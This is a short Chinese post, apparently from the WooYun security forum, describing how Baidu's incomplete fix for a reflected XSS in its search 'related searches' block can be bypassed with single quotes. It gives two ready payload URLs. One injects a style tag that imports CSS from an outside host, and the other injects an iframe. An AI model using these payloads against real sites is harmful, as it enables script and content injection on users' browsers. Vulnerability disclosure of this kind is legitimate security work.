百度这样修复首页xss (WOOYUN)

之前发的这个http://zone.wooyun.org/content/17235，大家应该看到了，因为没含量就分享出来娱乐。
    问题出在“相关搜索”里，<div class="result-op xpath-log" tpl="right_recommends" data-click="{'fm':'alxr'所以测试代码是">或" onxxx="xxx这样的。晚上一看，百度修复了，把"\/三个用\转义。再细看把标签属性有双引号变单引号，如<div class="result-op xpath-log" tpl="right_recommends" data-click='{"fm":"alxr"于是测试单引号，尼玛又出来了！相关人员真的是没有整体思维，怎么能在百度搜索混呢。

    效果代码:
http://www.baidu.com/s?wd=%27%3E%3Cstyle%3E@import+url(http://tmxk.org/.css);+z-index:9999%27%3E

    一般测试:
http://www.baidu.com/s?wd=%27%3E%3Ciframe%20%3E